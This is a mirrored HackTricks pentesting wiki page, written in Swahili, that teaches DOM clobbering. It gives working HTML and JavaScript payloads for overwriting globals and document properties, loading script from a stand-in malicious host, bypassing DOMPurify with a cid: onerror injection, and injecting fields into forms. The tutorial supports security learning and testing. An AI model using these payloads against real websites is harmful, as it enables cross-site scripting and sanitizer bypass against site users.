maride/hacktricks
1
0
Fork 0
mirror of https://github.com/HackTricks-wiki/hacktricks.git synced 2025-10-10 18:36:50 +00:00
Code Issues Packages Projects Releases Wiki Activity
hacktricks/src/pentesting-web/xss-cross-site-scripting/dom-clobbering.md

220 lines
10 KiB
Markdown
Raw Blame History

This file contains invisible Unicode characters

This file contains invisible Unicode characters that are indistinguishable to humans but may be processed differently by a computer. If you think that this is intentional, you can safely ignore this warning. Use the Escape button to reveal them.

# Dom Clobbering
{{#include ../../banners/hacktricks-training.md}}
## **Msingi**
Inawezekana kuunda **mabadiliko ya kimataifa ndani ya muktadha wa JS** kwa kutumia sifa **`id`** na **`name`** katika vitambulisho vya HTML.
```html
<form id="x"></form>
<script>
console.log(typeof document.x) //[object HTMLFormElement]
</script>
```
**Tu** vipengele fulani tu vinaweza kutumia **sifa ya jina** ili kuharibu globals, ni: `embed`, `form`, `iframe`, `image`, `img` na `object`.
Kwa kushangaza, unapokuwa unatumia **kipengele cha fomu** ku **haribu** variable, utapata **`toString`** ya kipengele chenyewe: `[object HTMLFormElement]` lakini kwa **kiungo** **`toString`** itakuwa **`href`** ya kiungo. Hivyo, ikiwa uta **haribu** kwa kutumia **`a`** tag, unaweza **kontroli** **thamani** wakati inachukuliwa kama **string**:
```html
<a href="controlled string" id="x"></a>
<script>
console.log(x) //controlled string
</script>
```
### Arrays & Attributes
Inawezekana pia **kuharibu array** na **sifa za kitu**:
```html
<a id="x">
<a id="x" name="y" href="controlled">
<script>
console.log(x[1]) //controlled
console.log(x.y) //controlled
</script></a
></a
>
```
Ili kubadilisha **sifa ya 3rd** (mfano x.y.z), unahitaji kutumia **`form`**:
```html
<form id="x" name="y"><input id="z" value="controlled" /></form>
<form id="x"></form>
<script>
alert(x.y.z.value) //controlled
</script>
```
Kukandamiza sifa zaidi ni **ngumu zaidi lakini bado inawezekana**, kwa kutumia iframes:
```html
<iframe name="x" srcdoc="<a id=y href=controlled></a>"></iframe>
<style>
@import "https://google.com";
</style>
<script>
alert(x.y) //controlled
</script>
```
> [!WARNING]
> Tag ya style inatumika kutoa **muda wa kutosha kwa iframe kuonyesha**. Bila yake utaona arifa ya **undefined**.
Ili kuharibu sifa za ndani zaidi, unaweza kutumia **iframes zenye uandishi wa html** hivi:
```html
<iframe
name="a"
srcdoc="<iframe srcdoc='<iframe name=c srcdoc=<a/id=d&amp;amp;#x20;name=e&amp;amp;#x20;href=\controlled&amp;amp;gt;<a&amp;amp;#x20;id=d&amp;amp;gt; name=d>' name=b>"></iframe>
<style>
@import "https://google.com";
</style>
<script>
alert(a.b.c.d.e) //controlled
</script>
```
### **Kupita Kichujio**
Ikiwa kichujio kina **zunguka** kupitia **mali** za nodi kwa kutumia kitu kama `document.getElementByID('x').attributes` unaweza **kuharibu** mali **`.attributes`** na **kuvunja kichujio**. Mali nyingine za DOM kama **`tagName`**, **`nodeName`** au **`parentNode`** na zaidi pia zinaweza **kuharibiwa**.
```html
<form id="x"></form>
<form id="y">
<input name="nodeName" />
</form>
<script>
console.log(document.getElementById("x").nodeName) //FORM
console.log(document.getElementById("y").nodeName) //[object HTMLInputElement]
</script>
```
## **Clobbering `window.someObject`**
Katika JavaScript ni kawaida kupata:
```javascript
var someObject = window.someObject || {}
```
Kuharibu HTML kwenye ukurasa kunaruhusu kubadilisha `someObject` na nodi ya DOM, ambayo inaweza kuleta udhaifu wa usalama. Kwa mfano, unaweza kubadilisha `someObject` na kipengele cha kiungo kinachorejelea skripti mbaya:
```html
<a id=someObject href=//malicious-website.com/malicious.js></a>
```
Katika msimbo unaoweza kuathiriwa kama:
```html
<script>
window.onload = function () {
let someObject = window.someObject || {}
let script = document.createElement("script")
script.src = someObject.url
document.body.appendChild(script)
}
</script>
```
Hii mbinu inatumia chanzo cha script kutekeleza msimbo usiotakikana.
**Hila**: **`DOMPurify`** inakuwezesha kutumia **`cid:`** itifaki, ambayo **haiwezi kuandika URL kwa alama za nukuu mbili**. Hii inamaanisha unaweza **kuingiza alama ya nukuu mbili iliyowekwa ambayo itafutwa wakati wa utekelezaji**. Hivyo, kuingiza kitu kama **`<a id=defaultAvatar><a id=defaultAvatar name=avatar href="cid:&quot;onerror=alert(1)//">`** kutaifanya HTML iliyowekwa `&quot;` kuwa **futwa wakati wa utekelezaji** na **kuondoka** kutoka kwa thamani ya sifa ili **kuunda** tukio la **`onerror`**.
Mbinu nyingine inatumia kipengele cha **`form`**. Maktaba fulani za upande wa mteja zinakagua sifa za kipengele kipya cha fomu ili kuzisafisha. Hata hivyo, kwa kuongeza `input` yenye `id=attributes` ndani ya fomu, unabadilisha kwa ufanisi mali za sifa, kuzuia sanitizer kufikia sifa halisi.
Unaweza [**kupata mfano wa aina hii ya clobbering katika andiko hili la CTF**](iframes-in-xss-and-csp.md#iframes-in-sop-2).
## Clobbering object ya hati
Kulingana na nyaraka, inawezekana kubadilisha sifa za object ya hati kwa kutumia DOM Clobbering:
> [Document](https://html.spec.whatwg.org/multipage/dom.html#document) interface [inasaidia mali zenye majina](https://webidl.spec.whatwg.org/#dfn-support-named-properties). [Majina ya mali yanayosaidiwa](https://webidl.spec.whatwg.org/#dfn-supported-property-names) ya [Document](https://html.spec.whatwg.org/multipage/dom.html#document) object hati wakati wowote yanajumuisha yafuatayo, kwa [mpangilio wa mti](https://dom.spec.whatwg.org/#concept-tree-order) kulingana na kipengele kilichochangia, bila kuzingatia nakala za baadaye, na kwa thamani kutoka [id](https://html.spec.whatwg.org/multipage/dom.html#the-id-attribute) sifa zikija kabla ya thamani kutoka sifa za jina wakati kipengele kimoja kinachangia zote:
>
> \- Thamani ya sifa ya maudhui ya jina kwa [exposed](https://html.spec.whatwg.org/multipage/dom.html#exposed) [embed](https://html.spec.whatwg.org/multipage/iframe-embed-object.html#the-embed-element), [form](https://html.spec.whatwg.org/multipage/forms.html#the-form-element), [iframe](https://html.spec.whatwg.org/multipage/iframe-embed-object.html#the-iframe-element), [img](https://html.spec.whatwg.org/multipage/embedded-content.html#the-img-element), na [exposed](https://html.spec.whatwg.org/multipage/dom.html#exposed) [object](https://html.spec.whatwg.org/multipage/iframe-embed-object.html#the-object-element) vipengele ambavyo vina sifa ya maudhui ya jina isiyo tupu na viko [katika mti wa hati](https://dom.spec.whatwg.org/#in-a-document-tree) na hati kama [mizizi](https://dom.spec.whatwg.org/#concept-tree-root);\
> \
> \- Thamani ya [id](https://html.spec.whatwg.org/multipage/dom.html#the-id-attribute) sifa ya maudhui kwa [exposed](https://html.spec.whatwg.org/multipage/dom.html#exposed) [object](https://html.spec.whatwg.org/multipage/iframe-embed-object.html#the-object-element) vipengele ambavyo vina sifa ya maudhui ya [id](https://html.spec.whatwg.org/multipage/dom.html#the-id-attribute) isiyo tupu na viko [katika mti wa hati](https://dom.spec.whatwg.org/#in-a-document-tree) na hati kama [mizizi](https://dom.spec.whatwg.org/#concept-tree-root);\
> \
> \- Thamani ya [id](https://html.spec.whatwg.org/multipage/dom.html#the-id-attribute) sifa ya maudhui kwa [img](https://html.spec.whatwg.org/multipage/embedded-content.html#the-img-element) vipengele ambavyo vina sifa ya maudhui ya [id](https://html.spec.whatwg.org/multipage/dom.html#the-id-attribute) isiyo tupu na sifa ya maudhui ya jina isiyo tupu, na viko [katika mti wa hati](https://dom.spec.whatwg.org/#in-a-document-tree) na hati kama [mizizi](https://dom.spec.whatwg.org/#concept-tree-root).
Kwa kutumia mbinu hii unaweza kubadilisha **thamani zinazotumika sana kama `document.cookie`, `document.body`, `document.children`**, na hata mbinu katika interface ya Document kama `document.querySelector`.
```javascript
document.write("<img name=cookie />")
document.cookie
<img name="cookie">
typeof(document.cookie)
'object'
//Something more sanitize friendly than a img tag
document.write("<form name=cookie><input id=toString></form>")
document.cookie
HTMLCollection(2) [img, form, cookie: img]
typeof(document.cookie)
'object
```
## Kuandika baada ya kipengele kilichoharibiwa
Matokeo ya wito kwa **`document.getElementById()`** na **`document.querySelector()`** yanaweza kubadilishwa kwa kuingiza tag ya `<html>` au `<body>` yenye sifa sawa ya id. Hapa kuna jinsi inavyoweza kufanywa:
```html
<div style="display:none" id="cdnDomain" class="x">test</div>
<p>
<html id="cdnDomain" class="x">
clobbered
</html>
<script>
alert(document.getElementById("cdnDomain").innerText) // Clobbered
alert(document.querySelector(".x").innerText) // Clobbered
</script>
</p>
```
Zaidi ya hayo, kwa kutumia mitindo kuficha hizi lebo za HTML/body zilizowekwa, kuingiliwa kutoka kwa maandiko mengine katika `innerText` kunaweza kuzuiwa, hivyo kuboresha ufanisi wa shambulio:
```html
<div style="display:none" id="cdnDomain">test</div>
<p>existing text</p>
<html id="cdnDomain">
clobbered
</html>
<style>
p {
display: none;
}
</style>
<script>
alert(document.getElementById("cdnDomain").innerText) // Clobbered
</script>
```
Uchunguzi kuhusu SVG ulibaini kwamba tag `<body>` inaweza pia kutumika kwa ufanisi:
```html
<div style="display:none" id="cdnDomain">example.com</div>
<svg>
<body id="cdnDomain">
clobbered
</body>
</svg>
<script>
alert(document.getElementById("cdnDomain").innerText) // Clobbered
</script>
```
Ili tag ya HTML ifanye kazi ndani ya SVG katika vivinjari kama Chrome na Firefox, tag ya `<foreignobject>` inahitajika:
```html
<div style="display:none" id="cdnDomain">example.com</div>
<svg>
<foreignobject>
<html id="cdnDomain">
clobbered
</html>
</foreignobject>
</svg>
<script>
alert(document.getElementById("cdnDomain").innerText) // Clobbered
</script>
```
## Clobbering Forms
Ni uwezekano wa kuongeza **ingizo jipya ndani ya fomu** kwa ku **ainisha sifa ya `form`** ndani ya baadhi ya lebo. Unaweza kutumia hii ku **ongeza thamani mpya ndani ya fomu** na hata kuongeza **kitufe kipya** cha **kutuma** (clickjacking au kutumia baadhi ya msimbo wa JS `.click()`):
```html
<!--Add a new attribute and a new button to send-->
<textarea form="id-other-form" name="info">
";alert(1);//
</textarea>
<button form="id-other-form" type="submit" formaction="/edit" formmethod="post">
Click to send!
</button>
```
- Kwa maelezo zaidi kuhusu sifa za fomu katika [**button check this**](https://www.w3schools.com/tags/tag_button.asp)**.**
## Marejeleo
- [https://portswigger.net/research/hijacking-service-workers-via-dom-clobbering](https://portswigger.net/research/hijacking-service-workers-via-dom-clobbering)
- [https://portswigger.net/web-security/dom-based/dom-clobbering](https://portswigger.net/web-security/dom-based/dom-clobbering)
- Heyes, Gareth. JavaScript for hackers: Learn to think like a hacker.
{{#include ../../banners/hacktricks-training.md}}
Reference in New Issue View Git Blame Copy Permalink